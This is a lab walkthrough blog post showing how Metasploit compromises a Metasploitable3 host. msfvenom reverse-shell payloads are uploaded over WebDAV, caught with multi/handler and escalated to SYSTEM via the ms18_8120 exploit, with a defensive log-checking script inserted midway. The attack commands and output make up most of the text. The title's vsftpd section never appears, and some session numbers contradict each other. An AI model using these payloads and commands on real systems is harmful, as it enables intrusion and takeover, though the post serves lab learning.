Metasploit deep dive: ms18_8120 and vsftpd 2.3.4

Metasploit is a very capable post-exploitation framework. This post studies Metasploit by reproducing the vsftpd 2.3.4 vulnerability and the ms18_8120 vulnerability.

Introduction

  First of all, why is Metasploit (msf from here on) so powerful? msf itself ships with 1851 exploit modules, 1046 auxiliary modules, 541 payloads and 44 encoders (v5.0.1). Beyond that, it can call external plugins, it is open source, and it can load modules you write yourself. msf is very good, but it is not the best tool for everything; this post focuses on learning msf, and in the lab environment there are certainly better ways in.
  The command to start msf is msfconsole. If it warns that the database is not running, you can start Metasploit's database with /etc/init.d/postgresql start. If you need to carry out a penetration test and have no suitable tools at hand, msf can do all of the work.

1. Scanning

  The command msf uses to call nmap is db_nmap; its usage is much the same as nmap's. You can also scan with msf's own scanning modules; commonly used ones are brute_dirs, dir_listing and dir_scanner.

2. Reproduction

  The target host 192.168.1.66:8585 has a WebDAV (dav2) file-upload vulnerability. The attack idea, roughly, is to use this upload vulnerability to place a payload on the host, get a shell on it, and then escalate privileges.
First we build a payload:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.70 lport=13579 -f raw > /root/Desktop/13579.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30656 bytes

-p selects the payload, lhost is the local IP, lport is the local listening port, -f is the output format, and > redirects the output to a file.

Next we need to upload the script, which is done with the davtest tool. davtest can automatically send test files for each file type, create a randomly named directory to help hide the files, send text files and try to move them to executable file names, clean up the uploaded files automatically, and send arbitrary files.

root@kali:~/Desktop# davtest -url http://192.168.1.66:8585/uploads/ -uploadfile 13579.php -uploadloc 13579.php 
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.1.66:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.1.66:8585/uploads/13579.php

-url is the target URL, -uploadfile is the file to upload, and -uploadloc is the upload location. Once that is ready we can start:

root@kali:~# msfconsole -q
[-] ***
[-] * WARNING: No database support: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

[-] ***
[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lport 13579
lport => 13579
msf5 exploit(multi/handler) > set lhost 192.168.1.70
lhost => 192.168.1.70
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.70:13579

The -q flag when starting msf suppresses the banner. In exploit -j -z, -j runs the exploit as a background job and -z tells it not to interact with the session automatically; a job means that once the reverse shell calls back and a session is established, the handler does not stop but keeps listening. A session can be understood as one established connection with the target. At this point we only need to request the payload we uploaded and the shell will call back (a browser works too):

curl http://192.168.1.66:8585/uploads/13579.php
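As an added defender-side example (not part of the original post): a small Python checker that walks constructed web-server access log lines and flags the upload-then-fetch sequence shown above, i.e. a successful WebDAV PUT/MOVE of a script or binary under /uploads/ followed by a GET of the same file. The log format, the sample lines and the /uploads/ prefix are assumptions modelled on this walkthrough.

```python
import re

# Constructed Apache-style access log lines modelled on the walkthrough
# (WebDAV PUT into /uploads/, then an HTTP GET of the uploaded .php); not real data.
SAMPLE_LOG = """\
192.168.1.70 - - [22/Jan/2019:02:28:10 -0500] "PROPFIND /uploads/ HTTP/1.1" 207 512
192.168.1.70 - - [22/Jan/2019:02:28:11 -0500] "PUT /uploads/13579.php HTTP/1.1" 201 0
192.168.1.70 - - [22/Jan/2019:02:30:29 -0500] "GET /uploads/13579.php HTTP/1.1" 200 0
192.168.1.70 - - [22/Jan/2019:02:36:00 -0500] "PUT /uploads/13789.exe HTTP/1.1" 201 0
192.168.1.50 - - [22/Jan/2019:02:40:00 -0500] "GET /uploads/report.pdf HTTP/1.1" 200 88231
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
WRITE_METHODS = {"PUT", "MOVE", "COPY"}   # WebDAV methods that create or rename files
RISKY_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp", ".exe", ".dll")


def parse_line(line):
    """Return (client, timestamp, method, path, status) or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    return client, ts, method.upper(), path.split("?", 1)[0], int(status)


def find_upload_chains(log_text, watched_prefix="/uploads/"):
    """Flag successful WebDAV writes of script/binary files under watched_prefix.

    Each alert records whether the same file was fetched afterwards, which is the
    'upload, then trigger' sequence a web-shell style reverse payload needs.
    """
    alerts = []
    for parsed in filter(None, map(parse_line, log_text.splitlines())):
        client, ts, method, path, status = parsed
        if not path.startswith(watched_prefix):
            continue
        if method in WRITE_METHODS and 200 <= status < 300 and path.lower().endswith(RISKY_EXT):
            alerts.append({"client": client, "path": path, "at": ts, "fetched_later": False})
        elif method == "GET" and status < 400:
            # Only writes already seen (i.e. earlier in the log) can be marked as triggered.
            for alert in alerts:
                if alert["path"] == path:
                    alert["fetched_later"] = True
    return alerts


if __name__ == "__main__":
    for a in find_upload_chains(SAMPLE_LOG):
        print(f"ALERT {a['at']} {a['client']} wrote {a['path']} (fetched later: {a['fetched_later']})")
```

The executable written in the second step of the walkthrough is launched from an existing shell rather than over HTTP, so it shows up here as a write that was never fetched; that is why the check reports both kinds of event instead of only completed chains.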

getshell

msf5 exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.1.70:13579 -> 192.168.1.66:49816) at 2019-01-22 02:30:29 -0500
[*] Meterpreter session 2 opened (192.168.1.70:13579 -> 192.168.1.66:49817) at 2019-01-22 02:30:31 -0500

meterpreter > background
msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3  192.168.1.70:13579 -> 192.168.1.66:49816 (192.168.1.66)

background returns to the msf console. The shell obtained after getshell runs with LOCAL SERVICE privileges, so we upload another payload to get a shell with higher privileges:

root@kali:~/Desktop# msfvenom -p windows/meterpreter_reverse_tcp Lhost=192.168.1.70 lport=13789 -f exe > 13789.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 179779 bytes
Final size of exe file: 254976 bytes

Upload it:

root@kali:~/Desktop# davtest -url http://192.168.1.66:8585/uploads/ -uploadfile 13789.exe -uploadloc 13789.exe
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.1.66:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.1.66:8585/uploads/13789.exe

Start the msf listener; sessions -i 1 selects the session with id 1, getwd prints the current absolute path, and execute -f runs a file:

msf5 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp 
payload => windows/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > show options 
msf5 exploit(multi/handler) > set lport 13789
lport => 13789
msf5 exploit(multi/handler) > exploit -j -z

msf5 exploit(multi/handler) > sessions -i 1
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.70:13789 

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getwd
C:\wamp\www\uploads
meterpreter > execute -f "C:\\wamp\\www\\uploads\\13789.exe"
Process 1372 created.
meterpreter > [*] Meterpreter session 3 opened (192.168.1.70:13789 -> 192.168.1.66:50670) at 2019-01-22 02:38:39 -0500

Using the first payload we uploaded to run the second one, we get ordinary-user privileges:

msf5 exploit(multi/handler) > sessions 
Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3           192.168.1.70:13579 -> 192.168.1.66:53138 (192.168.1.66)
  2         meterpreter x86/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.1.70:13789 -> 192.168.1.66:54852 (192.168.1.66)

Next we escalate privileges with ms18_8120:

msf5 exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc 
msf5 exploit(windows/local/ms18_8120_win32k_privesc) > set session 3
session => 3

msf5 exploit(windows/local/ms18_8120_win32k_privesc) > exploit 

[*] Started reverse TCP handler on 192.168.1.70:4444 
[*] Sending stage (179779 bytes) to 192.168.1.66
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Meterpreter session 4 opened (192.168.1.70:4444 -> 192.168.1.66:50799) at 2019-01-22 02:42:04 -0500

meterpreter >

Looking at the sessions, the ordinary-user session has become a SYSTEM session:

msf5 exploit(windows/local/ms18_8120_win32k_privesc) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3           192.168.1.70:13579 -> 192.168.1.66:53138 (192.168.1.66)
  2         meterpreter x86/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.1.70:13789 -> 192.168.1.66:54852 (192.168.1.66)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.1.70:4444 -> 192.168.1.66:62289 (192.168.1.66)

That completes the reproduction.


Unless otherwise stated, all posts on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.